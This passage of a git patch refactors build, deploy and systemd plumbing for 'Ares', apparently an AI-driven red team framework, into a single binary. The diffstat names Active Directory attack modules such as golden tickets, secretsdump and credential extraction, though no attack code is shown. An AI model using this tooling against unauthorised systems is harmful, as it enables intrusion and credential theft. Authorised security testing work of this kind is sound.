From 13119f842d7fefb5d48c10838f0376934b98791e Mon Sep 17 00:00:00 2001
From: Jayson Grace
Date: Fri, 17 Apr 2026 08:13:23 -0600
Subject: [PATCH 01/10] refactor: consolidate ares binaries into a single unified 'ares' binary

**Changed:**

- Replaced the separate `ares-cli`, `ares-orchestrator`, and `ares-worker` binaries with a single unified `ares` binary that exposes the CLI, orchestrator, and worker roles as subcommands (`ares ops`, `ares orchestrator`, `ares worker`, etc.).
- Moved all orchestrator and worker logic into the `ares-cli` crate, which now builds the `ares` binary; subcommand dispatch is handled by clap, with the `blue` feature flag gating blue-team functionality. A condensed sketch of the dispatch shape follows below.
- Removed `ares-orchestrator` and `ares-worker` as separate workspace members from the Rust workspace and Cargo.toml.
- Updated all CI/CD workflows, Taskfiles, Ansible templates, Docker/Warpgate build scripts, systemd unit files, shell scripts, and documentation to build, deploy, and invoke only `ares` in place of the three split binaries.
- Updated tool and inventory checks, agent registration, and heartbeat logic to the new binary naming convention, and adjusted the automation, exploitation, and result-processing modules to the unified module layout.

**Removed:**

- The `ares-orchestrator` and `ares-worker` workspace members, their Cargo.toml entries, and their duplicated entrypoints.
- All build, deploy, and packaging references to the split binaries in CI/CD, Warpgate, container templates, systemd unit files, and EC2/k8s scripts, along with the remaining split-binary invocation patterns.
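For reviewers, the dispatch shape, condensed from the `ares-cli/src/cli/mod.rs` and `ares-cli/src/main.rs` hunks in this patch (a sketch, not the full enum; the elided variants and arms are the pre-existing CLI subcommands):

```rust
use clap::{Parser, Subcommand};

/// Unified `ares` entrypoint: one clap parser, one dispatch match.
#[derive(Parser)]
#[command(name = "ares", about = "Ares red team orchestration system", version)]
struct Cli {
    #[command(subcommand)]
    command: Commands,
}

#[derive(Subcommand)]
enum Commands {
    // ...existing CLI subcommands elided (Ops, Blue, History, Config, ...)
    /// Run the orchestrator (long-running service)
    Orchestrator,
    /// Run a worker (task executor)
    Worker,
}

async fn run(cli: Cli) -> anyhow::Result<()> {
    match cli.command {
        // ...existing CLI dispatch arms elided
        Commands::Orchestrator => orchestrator::run().await,
        Commands::Worker => worker::run().await,
    }
}
```

The same binary therefore serves as a short-lived CLI client (`ares ops loot --latest`) and as the long-running services (`ares orchestrator`, `ares worker`), which is what lets the systemd units, wrapper scripts, and k8s deploys below all ship one artifact.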
--- .github/workflows/release.yaml | 2 +- .taskfiles/blue/Taskfile.yaml | 2 +- .taskfiles/ec2/Taskfile.yaml | 40 +- .../ec2/scripts/launch-orchestrator.sh.tmpl | 4 +- .taskfiles/ec2/scripts/setup.sh | 2 +- .taskfiles/ec2/scripts/status.sh | 2 +- .taskfiles/red/Taskfile.yaml | 2 +- .taskfiles/remote/Taskfile.yaml | 147 +--- .../remote/orchestrator-wrapper-patch.json | 2 +- .../remote/orchestrator-wrapper-patch.yaml | 6 +- .taskfiles/remote/orchestrator-wrapper.sh | 6 +- Cargo.lock | 48 +- Cargo.toml | 2 +- Taskfile.yaml | 4 +- ares-cli/Cargo.toml | 20 +- ares-cli/build.rs | 95 +++ ares-cli/src/cli/mod.rs | 10 +- ares-cli/src/main.rs | 10 +- ares-cli/src/orchestrator/automation/acl.rs | 149 ++++ ares-cli/src/orchestrator/automation/adcs.rs | 79 ++ .../src/orchestrator/automation/bloodhound.rs | 81 ++ .../src/orchestrator/automation/coercion.rs | 78 ++ ares-cli/src/orchestrator/automation/crack.rs | 75 ++ .../automation/credential_access.rs | 479 +++++++++++ .../automation/credential_expansion.rs | 410 ++++++++++ .../src/orchestrator/automation/delegation.rs | 103 +++ ares-cli/src/orchestrator/automation/gmsa.rs | 145 ++++ .../orchestrator/automation/golden_ticket.rs | 295 +++++++ ares-cli/src/orchestrator/automation/mod.rs | 64 ++ ares-cli/src/orchestrator/automation/mssql.rs | 94 +++ .../src/orchestrator/automation/refresh.rs | 32 + ares-cli/src/orchestrator/automation/s4u.rs | 354 +++++++++ .../orchestrator/automation/secretsdump.rs | 98 +++ .../src/orchestrator/automation/share_enum.rs | 106 +++ .../src/orchestrator/automation/shares.rs | 82 ++ .../automation/stall_detection.rs | 248 ++++++ ares-cli/src/orchestrator/automation/trust.rs | 448 +++++++++++ .../orchestrator/automation/unconstrained.rs | 385 +++++++++ .../src/orchestrator/automation_spawner.rs | 47 ++ ares-cli/src/orchestrator/blue/auto_submit.rs | 246 ++++++ ares-cli/src/orchestrator/blue/callbacks.rs | 621 +++++++++++++++ ares-cli/src/orchestrator/blue/chaining.rs | 598 ++++++++++++++ .../src/orchestrator/blue/investigation.rs | 570 +++++++++++++ ares-cli/src/orchestrator/blue/mod.rs | 19 + ares-cli/src/orchestrator/blue/runner.rs | 401 ++++++++++ ares-cli/src/orchestrator/blue/sub_agent.rs | 140 ++++ ares-cli/src/orchestrator/bootstrap.rs | 164 ++++ .../orchestrator/callback_handler/dispatch.rs | 251 ++++++ .../src/orchestrator/callback_handler/mod.rs | 111 +++ .../orchestrator/callback_handler/query.rs | 318 ++++++++ .../orchestrator/callback_handler/tests.rs | 547 +++++++++++++ ares-cli/src/orchestrator/completion.rs | 492 ++++++++++++ ares-cli/src/orchestrator/config.rs | 365 +++++++++ ares-cli/src/orchestrator/cost_summary.rs | 87 ++ ares-cli/src/orchestrator/deferred.rs | 395 +++++++++ ares-cli/src/orchestrator/dispatcher/mod.rs | 132 ++++ .../src/orchestrator/dispatcher/submission.rs | 450 +++++++++++ .../orchestrator/dispatcher/task_builders.rs | 463 +++++++++++ ares-cli/src/orchestrator/exploitation.rs | 196 +++++ ares-cli/src/orchestrator/llm_runner.rs | 372 +++++++++ ares-cli/src/orchestrator/mod.rs | 748 ++++++++++++++++++ ares-cli/src/orchestrator/monitoring.rs | 471 +++++++++++ .../orchestrator/output_extraction/hashes.rs | 308 ++++++++ .../orchestrator/output_extraction/hosts.rs | 108 +++ .../src/orchestrator/output_extraction/mod.rs | 160 ++++ .../output_extraction/passwords.rs | 178 +++++ .../orchestrator/output_extraction/shares.rs | 80 ++ .../orchestrator/output_extraction/tests.rs | 538 +++++++++++++ .../orchestrator/output_extraction/users.rs | 148 ++++ ares-cli/src/orchestrator/recovery/dedup.rs | 273 
+++++++ ares-cli/src/orchestrator/recovery/manager.rs | 256 ++++++ ares-cli/src/orchestrator/recovery/mod.rs | 440 +++++++++++ .../src/orchestrator/recovery/normalize.rs | 171 ++++ ares-cli/src/orchestrator/recovery/requeue.rs | 59 ++ .../orchestrator/recovery/resume_helper.rs | 165 ++++ ares-cli/src/orchestrator/recovery/types.rs | 127 +++ .../result_processing/admin_checks.rs | 328 ++++++++ .../result_processing/discovery_polling.rs | 190 +++++ .../src/orchestrator/result_processing/mod.rs | 611 ++++++++++++++ .../orchestrator/result_processing/parsing.rs | 159 ++++ .../orchestrator/result_processing/tests.rs | 211 +++++ .../result_processing/timeline.rs | 100 +++ ares-cli/src/orchestrator/results.rs | 185 +++++ ares-cli/src/orchestrator/routing.rs | 258 ++++++ ares-cli/src/orchestrator/state/dedup.rs | 69 ++ ares-cli/src/orchestrator/state/inner.rs | 377 +++++++++ ares-cli/src/orchestrator/state/mod.rs | 75 ++ .../src/orchestrator/state/persistence.rs | 330 ++++++++ .../state/publishing/credentials.rs | 221 ++++++ .../orchestrator/state/publishing/entities.rs | 252 ++++++ .../orchestrator/state/publishing/hosts.rs | 342 ++++++++ .../state/publishing/milestones.rs | 156 ++++ .../src/orchestrator/state/publishing/mod.rs | 118 +++ ares-cli/src/orchestrator/state/shared.rs | 234 ++++++ ares-cli/src/orchestrator/task_queue.rs | 488 ++++++++++++ ares-cli/src/orchestrator/throttling.rs | 440 +++++++++++ .../tool_dispatcher/auth_throttle.rs | 88 +++ .../src/orchestrator/tool_dispatcher/local.rs | 91 +++ .../src/orchestrator/tool_dispatcher/mod.rs | 228 ++++++ .../tool_dispatcher/redis_dispatcher.rs | 165 ++++ .../src/orchestrator/tool_dispatcher/tests.rs | 98 +++ ares-cli/src/transport.rs | 8 +- ares-cli/src/worker/blue_task_loop.rs | 385 +++++++++ ares-cli/src/worker/config.rs | 199 +++++ ares-cli/src/worker/heartbeat.rs | 155 ++++ ares-cli/src/worker/hosts.rs | 238 ++++++ ares-cli/src/worker/mod.rs | 156 ++++ ares-cli/src/worker/task_loop/executor.rs | 415 ++++++++++ ares-cli/src/worker/task_loop/mod.rs | 236 ++++++ .../src/worker/task_loop/result_handler.rs | 215 +++++ ares-cli/src/worker/task_loop/types.rs | 180 +++++ ares-cli/src/worker/tool_check.rs | 273 +++++++ ares-cli/src/worker/tool_executor.rs | 452 +++++++++++ .../templates/ares-acl-agent/warpgate.yaml | 4 +- .../templates/ares-blue-agent/warpgate.yaml | 6 +- .../warpgate.yaml | 6 +- .../warpgate.yaml | 6 +- .../ares-blue-triage-agent/warpgate.yaml | 6 +- .../templates/ares-cli/warpgate.yaml | 6 +- .../ares-coercion-agent/warpgate.yaml | 4 +- .../ares-cracker-agent-gpu/warpgate.yaml | 4 +- .../ares-cracker-agent/warpgate.yaml | 4 +- .../warpgate.yaml | 4 +- .../ares-lateral-movement-agent/warpgate.yaml | 4 +- .../templates/ares-orchestrator/warpgate.yaml | 6 +- .../ares-privesc-agent/warpgate.yaml | 4 +- .../templates/ares-recon-agent/warpgate.yaml | 4 +- .../templates/ares-worker/warpgate.yaml | 6 +- 128 files changed, 23988 insertions(+), 236 deletions(-) create mode 100644 ares-cli/build.rs create mode 100644 ares-cli/src/orchestrator/automation/acl.rs create mode 100644 ares-cli/src/orchestrator/automation/adcs.rs create mode 100644 ares-cli/src/orchestrator/automation/bloodhound.rs create mode 100644 ares-cli/src/orchestrator/automation/coercion.rs create mode 100644 ares-cli/src/orchestrator/automation/crack.rs create mode 100644 ares-cli/src/orchestrator/automation/credential_access.rs create mode 100644 ares-cli/src/orchestrator/automation/credential_expansion.rs create mode 100644 
ares-cli/src/orchestrator/automation/delegation.rs create mode 100644 ares-cli/src/orchestrator/automation/gmsa.rs create mode 100644 ares-cli/src/orchestrator/automation/golden_ticket.rs create mode 100644 ares-cli/src/orchestrator/automation/mod.rs create mode 100644 ares-cli/src/orchestrator/automation/mssql.rs create mode 100644 ares-cli/src/orchestrator/automation/refresh.rs create mode 100644 ares-cli/src/orchestrator/automation/s4u.rs create mode 100644 ares-cli/src/orchestrator/automation/secretsdump.rs create mode 100644 ares-cli/src/orchestrator/automation/share_enum.rs create mode 100644 ares-cli/src/orchestrator/automation/shares.rs create mode 100644 ares-cli/src/orchestrator/automation/stall_detection.rs create mode 100644 ares-cli/src/orchestrator/automation/trust.rs create mode 100644 ares-cli/src/orchestrator/automation/unconstrained.rs create mode 100644 ares-cli/src/orchestrator/automation_spawner.rs create mode 100644 ares-cli/src/orchestrator/blue/auto_submit.rs create mode 100644 ares-cli/src/orchestrator/blue/callbacks.rs create mode 100644 ares-cli/src/orchestrator/blue/chaining.rs create mode 100644 ares-cli/src/orchestrator/blue/investigation.rs create mode 100644 ares-cli/src/orchestrator/blue/mod.rs create mode 100644 ares-cli/src/orchestrator/blue/runner.rs create mode 100644 ares-cli/src/orchestrator/blue/sub_agent.rs create mode 100644 ares-cli/src/orchestrator/bootstrap.rs create mode 100644 ares-cli/src/orchestrator/callback_handler/dispatch.rs create mode 100644 ares-cli/src/orchestrator/callback_handler/mod.rs create mode 100644 ares-cli/src/orchestrator/callback_handler/query.rs create mode 100644 ares-cli/src/orchestrator/callback_handler/tests.rs create mode 100644 ares-cli/src/orchestrator/completion.rs create mode 100644 ares-cli/src/orchestrator/config.rs create mode 100644 ares-cli/src/orchestrator/cost_summary.rs create mode 100644 ares-cli/src/orchestrator/deferred.rs create mode 100644 ares-cli/src/orchestrator/dispatcher/mod.rs create mode 100644 ares-cli/src/orchestrator/dispatcher/submission.rs create mode 100644 ares-cli/src/orchestrator/dispatcher/task_builders.rs create mode 100644 ares-cli/src/orchestrator/exploitation.rs create mode 100644 ares-cli/src/orchestrator/llm_runner.rs create mode 100644 ares-cli/src/orchestrator/mod.rs create mode 100644 ares-cli/src/orchestrator/monitoring.rs create mode 100644 ares-cli/src/orchestrator/output_extraction/hashes.rs create mode 100644 ares-cli/src/orchestrator/output_extraction/hosts.rs create mode 100644 ares-cli/src/orchestrator/output_extraction/mod.rs create mode 100644 ares-cli/src/orchestrator/output_extraction/passwords.rs create mode 100644 ares-cli/src/orchestrator/output_extraction/shares.rs create mode 100644 ares-cli/src/orchestrator/output_extraction/tests.rs create mode 100644 ares-cli/src/orchestrator/output_extraction/users.rs create mode 100644 ares-cli/src/orchestrator/recovery/dedup.rs create mode 100644 ares-cli/src/orchestrator/recovery/manager.rs create mode 100644 ares-cli/src/orchestrator/recovery/mod.rs create mode 100644 ares-cli/src/orchestrator/recovery/normalize.rs create mode 100644 ares-cli/src/orchestrator/recovery/requeue.rs create mode 100644 ares-cli/src/orchestrator/recovery/resume_helper.rs create mode 100644 ares-cli/src/orchestrator/recovery/types.rs create mode 100644 ares-cli/src/orchestrator/result_processing/admin_checks.rs create mode 100644 ares-cli/src/orchestrator/result_processing/discovery_polling.rs create mode 100644 
ares-cli/src/orchestrator/result_processing/mod.rs create mode 100644 ares-cli/src/orchestrator/result_processing/parsing.rs create mode 100644 ares-cli/src/orchestrator/result_processing/tests.rs create mode 100644 ares-cli/src/orchestrator/result_processing/timeline.rs create mode 100644 ares-cli/src/orchestrator/results.rs create mode 100644 ares-cli/src/orchestrator/routing.rs create mode 100644 ares-cli/src/orchestrator/state/dedup.rs create mode 100644 ares-cli/src/orchestrator/state/inner.rs create mode 100644 ares-cli/src/orchestrator/state/mod.rs create mode 100644 ares-cli/src/orchestrator/state/persistence.rs create mode 100644 ares-cli/src/orchestrator/state/publishing/credentials.rs create mode 100644 ares-cli/src/orchestrator/state/publishing/entities.rs create mode 100644 ares-cli/src/orchestrator/state/publishing/hosts.rs create mode 100644 ares-cli/src/orchestrator/state/publishing/milestones.rs create mode 100644 ares-cli/src/orchestrator/state/publishing/mod.rs create mode 100644 ares-cli/src/orchestrator/state/shared.rs create mode 100644 ares-cli/src/orchestrator/task_queue.rs create mode 100644 ares-cli/src/orchestrator/throttling.rs create mode 100644 ares-cli/src/orchestrator/tool_dispatcher/auth_throttle.rs create mode 100644 ares-cli/src/orchestrator/tool_dispatcher/local.rs create mode 100644 ares-cli/src/orchestrator/tool_dispatcher/mod.rs create mode 100644 ares-cli/src/orchestrator/tool_dispatcher/redis_dispatcher.rs create mode 100644 ares-cli/src/orchestrator/tool_dispatcher/tests.rs create mode 100644 ares-cli/src/worker/blue_task_loop.rs create mode 100644 ares-cli/src/worker/config.rs create mode 100644 ares-cli/src/worker/heartbeat.rs create mode 100644 ares-cli/src/worker/hosts.rs create mode 100644 ares-cli/src/worker/mod.rs create mode 100644 ares-cli/src/worker/task_loop/executor.rs create mode 100644 ares-cli/src/worker/task_loop/mod.rs create mode 100644 ares-cli/src/worker/task_loop/result_handler.rs create mode 100644 ares-cli/src/worker/task_loop/types.rs create mode 100644 ares-cli/src/worker/tool_check.rs create mode 100644 ares-cli/src/worker/tool_executor.rs diff --git a/.github/workflows/release.yaml b/.github/workflows/release.yaml index 0e28751b..4996ac6a 100644 --- a/.github/workflows/release.yaml +++ b/.github/workflows/release.yaml @@ -72,7 +72,7 @@ jobs: shell: bash run: | TAG="${GITHUB_REF#refs/tags/}" - BINS=("ares-cli" "ares-orchestrator" "ares-worker") + BINS=("ares") for bin in "${BINS[@]}"; do ARCHIVE="${bin}-${TAG}-${{ matrix.target }}" diff --git a/.taskfiles/blue/Taskfile.yaml b/.taskfiles/blue/Taskfile.yaml index 0431648a..9c65fb01 100644 --- a/.taskfiles/blue/Taskfile.yaml +++ b/.taskfiles/blue/Taskfile.yaml @@ -4,7 +4,7 @@ version: "3" vars: # Rust CLI binary path (passed from parent Taskfile) - ARES_CLI: '{{.ARES_CLI | default "./target/release/ares-cli"}}' + ARES_CLI: '{{.ARES_CLI | default "./target/release/ares"}}' # AWS defaults for Grafana access PROFILE: '{{.PROFILE | default "infrastructure"}}' REGION: '{{.REGION | default "us-west-2"}}' diff --git a/.taskfiles/ec2/Taskfile.yaml b/.taskfiles/ec2/Taskfile.yaml index 1ee52e28..4e0e6ca1 100644 --- a/.taskfiles/ec2/Taskfile.yaml +++ b/.taskfiles/ec2/Taskfile.yaml @@ -157,9 +157,9 @@ tasks: "mkdir -p " + $build_dir, "aws s3 cp s3://" + $bucket + "/" + $prefix + "/ares-src.tar.gz /tmp/ares-src.tar.gz", "tar -xzf /tmp/ares-src.tar.gz -C " + $build_dir, - "cd " + $build_dir + " && CARGO_TARGET_X86_64_UNKNOWN_LINUX_GNU_LINKER=gcc cargo build --release -p ares-cli -p 
ares-orchestrator -p ares-worker 2>&1", - "for bin in ares-cli ares-orchestrator ares-worker; do cp " + $build_dir + "/target/release/$bin /usr/local/bin/$bin && chmod +x /usr/local/bin/$bin; done", - "echo Deployed: && ls -lh /usr/local/bin/ares-cli /usr/local/bin/ares-orchestrator /usr/local/bin/ares-worker" + "cd " + $build_dir + " && CARGO_TARGET_X86_64_UNKNOWN_LINUX_GNU_LINKER=gcc cargo build --release -p ares-cli 2>&1", + "cp " + $build_dir + "/target/release/ares /usr/local/bin/ares && chmod +x /usr/local/bin/ares", + "echo Deployed: && ls -lh /usr/local/bin/ares" ]}' > "$PARAMS_FILE" CMD_ID=$(aws ssm send-command \ @@ -227,9 +227,7 @@ tasks: cross build --release --target {{.RUST_TARGET}} -j "{{.CARGO_BUILD_JOBS}}" ;; zigbuild) - for pkg in ares-cli ares-orchestrator ares-worker; do - cargo zigbuild --release --target {{.RUST_TARGET}} -j "{{.CARGO_BUILD_JOBS}}" -p $pkg - done + cargo zigbuild --release --target {{.RUST_TARGET}} -j "{{.CARGO_BUILD_JOBS}}" -p ares-cli ;; cargo) echo -e "{{.WARN}} Using plain cargo (no cross-compilation toolchain)..." @@ -241,8 +239,8 @@ tasks: ;; esac - echo -e "{{.SUCCESS}} Binaries built:" - ls -lh {{.BIN_DIR}}/ares-cli {{.BIN_DIR}}/ares-orchestrator {{.BIN_DIR}}/ares-worker 2>/dev/null || true + echo -e "{{.SUCCESS}} Binary built:" + ls -lh {{.BIN_DIR}}/ares 2>/dev/null || true # Upload to S3 staging (skip for remote builds) - | @@ -250,7 +248,7 @@ tasks: echo -e "{{.INFO}} Uploading binaries to s3://{{.BCP_BUCKET}}/{{.S3_DEPLOY_PREFIX}}/..." - for bin in ares-cli ares-orchestrator ares-worker; do + for bin in ares; do aws s3 cp "{{.BIN_DIR}}/$bin" "s3://{{.BCP_BUCKET}}/{{.S3_DEPLOY_PREFIX}}/$bin" \ --profile "{{.EC2_PROFILE}}" --region "{{.EC2_REGION}}" done @@ -279,7 +277,7 @@ tasks: PARAMS_FILE=$(mktemp) trap "rm -f $PARAMS_FILE" EXIT jq -n --arg bucket "{{.BCP_BUCKET}}" --arg prefix "{{.S3_DEPLOY_PREFIX}}" \ - '{"commands": ["set -e; for bin in ares-cli ares-orchestrator ares-worker; do aws s3 cp s3://" + $bucket + "/" + $prefix + "/$bin /usr/local/bin/$bin; chmod +x /usr/local/bin/$bin; done; echo Deployed:; ls -lh /usr/local/bin/ares-*"]}' \ + '{"commands": ["set -e; aws s3 cp s3://" + $bucket + "/" + $prefix + "/ares /usr/local/bin/ares; chmod +x /usr/local/bin/ares; echo Deployed:; ls -lh /usr/local/bin/ares"]}' \ > "$PARAMS_FILE" CMD_ID=$(aws ssm send-command \ @@ -586,7 +584,7 @@ tasks: PARAMS_FILE=$(mktemp) trap "rm -f $PARAMS_FILE" EXIT - jq -n --arg units "$WORKER_UNITS" '{"commands": ["systemctl stop " + $units + " 2>/dev/null || true; pkill -f ares-orchestrator 2>/dev/null || true; echo Stopped all ares workers and orchestrator"]}' > "$PARAMS_FILE" + jq -n --arg units "$WORKER_UNITS" '{"commands": ["systemctl stop " + $units + " 2>/dev/null || true; pkill -f '\\''ares orchestrator'\\'' 2>/dev/null || true; echo Stopped all ares workers and orchestrator"]}' > "$PARAMS_FILE" CMD_ID=$(aws ssm send-command \ --profile "{{.EC2_PROFILE}}" \ @@ -628,7 +626,7 @@ tasks: - sh: '[ -n "{{.OPERATION_ID}}" ] || [ "{{.LATEST}}" = "true" ]' msg: "Provide OPERATION_ID=op-xxx or LATEST=true" cmd: >- - ares-cli --ec2 {{.EC2_NAME}} --ec2-profile {{.EC2_PROFILE}} --ec2-region {{.EC2_REGION}} + ares --ec2 {{.EC2_NAME}} --ec2-profile {{.EC2_PROFILE}} --ec2-region {{.EC2_REGION}} ops stop {{if ne .OPERATION_ID ""}}{{.OPERATION_ID}}{{end}} {{if eq .LATEST "true"}}--latest{{end}} @@ -750,7 +748,7 @@ tasks: sleep 1 echo -e "{{.INFO}} Port-forwarding Redis: localhost:16379 -> $INSTANCE_ID:6379" - echo -e "{{.INFO}} Use: ARES_REDIS_URL=redis://localhost:16379 
ares-cli ops loot --latest" + echo -e "{{.INFO}} Use: ARES_REDIS_URL=redis://localhost:16379 ares ops loot --latest" echo -e "{{.INFO}} Press Ctrl+C to stop" echo "" @@ -763,7 +761,7 @@ tasks: # ============================================================================ # CLI Operations (loot, runtime, report, list) - # These use `ares-cli --ec2` which handles instance resolution and SSM. + # These use `ares --ec2` which handles instance resolution and SSM. # ============================================================================ loot: desc: "Dump loot from EC2 via SSM (usage: task ec2:loot [EC2_NAME=ares-tools] [LATEST=true] [OPERATION_ID=op-xxx] [JSON=false] [DIFF=false])" @@ -774,7 +772,7 @@ tasks: JSON: '{{.JSON | default "false"}}' DIFF: '{{.DIFF | default "false"}}' cmd: >- - ares-cli --ec2 {{.EC2_NAME}} --ec2-profile {{.EC2_PROFILE}} --ec2-region {{.EC2_REGION}} + ares --ec2 {{.EC2_NAME}} --ec2-profile {{.EC2_PROFILE}} --ec2-region {{.EC2_REGION}} ops loot {{if ne .OPERATION_ID ""}}{{.OPERATION_ID}}{{end}} {{if eq .LATEST "true"}}--latest{{end}} @@ -788,7 +786,7 @@ tasks: OPERATION_ID: '{{.OPERATION_ID | default ""}}' LATEST: '{{.LATEST | default "true"}}' cmd: >- - ares-cli --ec2 {{.EC2_NAME}} --ec2-profile {{.EC2_PROFILE}} --ec2-region {{.EC2_REGION}} + ares --ec2 {{.EC2_NAME}} --ec2-profile {{.EC2_PROFILE}} --ec2-region {{.EC2_REGION}} ops runtime {{if ne .OPERATION_ID ""}}{{.OPERATION_ID}}{{end}} {{if eq .LATEST "true"}}--latest{{end}} @@ -817,7 +815,7 @@ tasks: fi # Step 1: Generate report on EC2 and get the operation ID + report content - REPORT_CMD="set -e; RUST_LOG=error ares-cli ops report" + REPORT_CMD="set -e; RUST_LOG=error ares ops report" {{if ne .OPERATION_ID ""}}REPORT_CMD="$REPORT_CMD {{.OPERATION_ID}}"{{end}} {{if eq .LATEST "true"}}REPORT_CMD="$REPORT_CMD --latest"{{end}} {{if eq .REGENERATE "true"}}REPORT_CMD="$REPORT_CMD --regenerate"{{end}} @@ -907,7 +905,7 @@ tasks: vars: LATEST: '{{.LATEST | default "false"}}' cmd: >- - ares-cli --ec2 {{.EC2_NAME}} --ec2-profile {{.EC2_PROFILE}} --ec2-region {{.EC2_REGION}} + ares --ec2 {{.EC2_NAME}} --ec2-profile {{.EC2_PROFILE}} --ec2-region {{.EC2_REGION}} ops list {{if eq .LATEST "true"}}--latest{{end}} @@ -1010,7 +1008,7 @@ tasks: set -e ${ENV_FILE_CMD} ${FLUSH_CMD} - pkill -f ares-orchestrator 2>/dev/null || true; sleep 1 + pkill -f 'ares orchestrator' 2>/dev/null || true; sleep 1 export OPENAI_API_KEY='${OPENAI_KEY}' export ANTHROPIC_API_KEY='${ANTHROPIC_KEY}' export GRAFANA_URL='${GRAFANA_URL_VAL}' @@ -1030,9 +1028,9 @@ tasks: export OTEL_RESOURCE_ATTRIBUTES='deployment.environment=staging,attack.team=red' export ARES_OPERATION_ID='${PAYLOAD}' mkdir -p {{.ARES_LOG_DIR}} - nohup /usr/local/bin/ares-orchestrator >{{.ARES_LOG_DIR}}/orchestrator.log 2>&1 & + nohup /usr/local/bin/ares orchestrator >{{.ARES_LOG_DIR}}/orchestrator.log 2>&1 & sleep 2 - if pgrep -f ares-orchestrator >/dev/null; then + if pgrep -f 'ares orchestrator' >/dev/null; then echo Orchestrator started for ${OP_ID} head -5 {{.ARES_LOG_DIR}}/orchestrator.log else diff --git a/.taskfiles/ec2/scripts/launch-orchestrator.sh.tmpl b/.taskfiles/ec2/scripts/launch-orchestrator.sh.tmpl index fe458944..cf671c24 100755 --- a/.taskfiles/ec2/scripts/launch-orchestrator.sh.tmpl +++ b/.taskfiles/ec2/scripts/launch-orchestrator.sh.tmpl @@ -29,7 +29,7 @@ export OTEL_EXPORTER_OTLP_TRACES_ENDPOINT='__OTEL_TRACES_ENDPOINT__' export OTEL_EXPORTER_OTLP_PROTOCOL='http/protobuf' export OTEL_EXPORTER_OTLP_HEADERS='X-Api-Key=__DREADNODE_API_KEY__' export 
OTEL_RESOURCE_ATTRIBUTES='deployment.environment=staging,attack.team=red' -pkill -f ares-orchestrator 2>/dev/null || true +pkill -f 'ares orchestrator' 2>/dev/null || true sleep 1 -nohup /usr/local/bin/ares-orchestrator >/var/log/ares/orchestrator.log 2>&1 & +nohup /usr/local/bin/ares orchestrator >/var/log/ares/orchestrator.log 2>&1 & echo "Orchestrator started (PID: $!)" diff --git a/.taskfiles/ec2/scripts/setup.sh b/.taskfiles/ec2/scripts/setup.sh index 45ead339..924522c0 100755 --- a/.taskfiles/ec2/scripts/setup.sh +++ b/.taskfiles/ec2/scripts/setup.sh @@ -30,7 +30,7 @@ Wants=redis.service [Service] Type=simple -ExecStart=/usr/local/bin/ares-worker +ExecStart=/usr/local/bin/ares worker EnvironmentFile=-/etc/ares/env Environment=ARES_REDIS_URL=redis://127.0.0.1:6379 Environment=ARES_WORKER_ROLE=%i diff --git a/.taskfiles/ec2/scripts/status.sh b/.taskfiles/ec2/scripts/status.sh index e5e0f250..03472831 100755 --- a/.taskfiles/ec2/scripts/status.sh +++ b/.taskfiles/ec2/scripts/status.sh @@ -17,7 +17,7 @@ done echo "" echo "=== Orchestrator ===" -ORCH_PID=$(pgrep -f ares-orchestrator 2>/dev/null || true) +ORCH_PID=$(pgrep -f 'ares orchestrator' 2>/dev/null || true) if [ -n "$ORCH_PID" ]; then echo " Running (PID: $ORCH_PID)" ps -p "$ORCH_PID" -o etime=,args= 2>/dev/null | head -1 diff --git a/.taskfiles/red/Taskfile.yaml b/.taskfiles/red/Taskfile.yaml index 064b10b8..2f95e820 100644 --- a/.taskfiles/red/Taskfile.yaml +++ b/.taskfiles/red/Taskfile.yaml @@ -9,7 +9,7 @@ shopt: [globstar] vars: # Rust CLI binary path (passed from parent Taskfile) - ARES_CLI: '{{.ARES_CLI | default "./target/release/ares-cli"}}' + ARES_CLI: '{{.ARES_CLI | default "./target/release/ares"}}' # Remote paths (local to this taskfile) REMOTE_REPORT_DIR: '{{.REMOTE_REPORT_DIR | default "/reports"}}' diff --git a/.taskfiles/remote/Taskfile.yaml b/.taskfiles/remote/Taskfile.yaml index 0725b9fb..dce4f16f 100644 --- a/.taskfiles/remote/Taskfile.yaml +++ b/.taskfiles/remote/Taskfile.yaml @@ -900,10 +900,8 @@ tasks: cargo build --release --target {{.RUST_TARGET}} fi - echo -e "{{.SUCCESS}} Binaries built:" - ls -lh target/{{.RUST_TARGET}}/release/ares-cli \ - target/{{.RUST_TARGET}}/release/ares-orchestrator \ - target/{{.RUST_TARGET}}/release/ares-worker 2>/dev/null || true + echo -e "{{.SUCCESS}} Binary built:" + ls -lh target/{{.RUST_TARGET}}/release/ares 2>/dev/null || true EOF orchestrator:patch-wrapper: @@ -932,18 +930,9 @@ tasks: echo -e "{{.INFO}} Comparing local Rust binaries to remote pods (team={{.TEAM}})" echo "" - # Check local binaries exist - LOCAL_BINS_FOUND=0 - for bin in ares-cli ares-orchestrator ares-worker; do - if [ -f "{{.BIN_DIR}}/$bin" ]; then - LOCAL_BINS_FOUND=$((LOCAL_BINS_FOUND + 1)) - else - echo -e "{{.WARN}} Local binary not found: {{.BIN_DIR}}/$bin" - fi - done - - if [ $LOCAL_BINS_FOUND -eq 0 ]; then - echo -e "{{.ERROR}} No local binaries found. Run: task remote:rust:build" + # Check local binary exists + if [ ! -f "{{.BIN_DIR}}/ares" ]; then + echo -e "{{.ERROR}} Local binary not found: {{.BIN_DIR}}/ares. Run: task remote:rust:build" exit 1 fi @@ -1016,59 +1005,32 @@ tasks: fi } - # Check orchestrator pods: ares-cli + ares-orchestrator - for pod in $ORCH_PODS; do - for bin in ares-cli ares-orchestrator; do - [ ! 
